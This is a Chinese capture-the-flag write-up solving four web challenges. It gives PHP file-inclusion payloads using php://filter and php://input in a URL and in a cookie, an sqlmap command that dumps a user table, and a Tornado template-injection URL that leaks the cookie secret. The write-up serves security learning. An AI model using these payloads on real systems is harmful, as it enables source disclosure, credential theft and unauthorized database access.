码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 攻防世界--fileclude && fileinclude && inget && easytornado


    一、fileclude

    
    include("flag.php");
    highlight_file(__FILE__);
    if(isset($_GET["file1"]) && isset($_GET["file2"]))
    {
        $file1 = $_GET["file1"];
        $file2 = $_GET["file2"];
        if(!empty($file1) && !empty($file2))
        {
            if(file_get_contents($file2) === "hello ctf")
            {
                include($file1);
            }
        }
        else
            die("NONONO");
    } 
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17

    两个参数file1和file2
    file2中包含数据file_get_contents
    直接访问flag.php只显示WRONG WAY!
    说明flag应该在flag.php的注释里
    包含的是file1
    所以

    ?file1=php://filter/read=convert.base64-encode/resource=flag.php
    
    • 1

    file2使用php伪协议传数据

    file2=php://input
    
    • 1

    最后
    http://61.147.171.105:61741/?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=php://input

    然后POST数据
    hello ctf
    在这里插入图片描述
    拿到flag
    在这里插入图片描述

    然后base64转码即可

    二、fileinclude

    注释
    在这里插入图片描述
    在这里插入图片描述
    发现源码泄露

    ?php
    if( !ini_get('display_errors') ) {
      ini_set('display_errors', 'On');
      }
    error_reporting(E_ALL);
    $lan = $_COOKIE['language'];
    if(!$lan)
    {
    	@setcookie("language","english");
    	@include("english.php");
    }
    else
    {
    	@include($lan.".php");
    }
    $x=file_get_contents('index.php');
    echo $x;
    ?
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18

    发现文件包含点在COOKIE中,使用php伪协议filter的读,base64编码

    COOKIE:language=php://filter/read=convert.base64-encode/resource=flag
    
    • 1

    在这里插入图片描述
    base转码
    在这里插入图片描述

    三、inget

    在这里插入图片描述
    SQL注入
    在这里插入图片描述
    在这里插入图片描述

    sqlmap -u "http://61.147.171.105:54122/?id=1" -T cyber -C user,ID,pw --dump
    
    • 1

    在这里插入图片描述

    四、easytornado

    模板注入
    在这里插入图片描述

    http://61.147.171.105:57847/error?msg={{handler.settings}}
    
    • 1

    在这里插入图片描述
    先把flag的filename进行md5,然后再把cookie_secret与md5后的值拼接,再md5
    在这里插入图片描述
    欢迎加入我的知识星球,内含有多篇赏金漏洞
    某211硕在读,三分之一的白帽子,三分之一的科研er,这里适合想要学习安全的小白师傅,适合致力于挖掘漏洞的师傅,适合安全研究人员师傅,以及想要做安全科研的师傅,想要了解网络空间安全研究生生活的师傅
    在这里插入图片描述

  • 相关阅读:
    JavaScript的迭代器与生成器
    Egg 1. 快速开始 Quick Start 1.3 一步步 Step by Step 1.3.3 添加静态资源 & 1.3.4 添加渲染模板
    PyTorch 深度学习之用PyTorch实现线性回归Linear Regression with PyTorch(四)
    Burp Suite--Get acquainted for the first time
    CS144 计算机网络 Lab2:TCP Receiver
    PCIE Order Set
    Python进阶教学——多线程高级应用
    springmvc第十六个练习(多个拦截器的执行和拦截器过滤器的比较)
    shell脚本基础——Shell运行原理+变量、数组定义
    Matlab:使用分类数组的好处
  • 原文地址:https://blog.csdn.net/xulei1132562/article/details/126533422
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号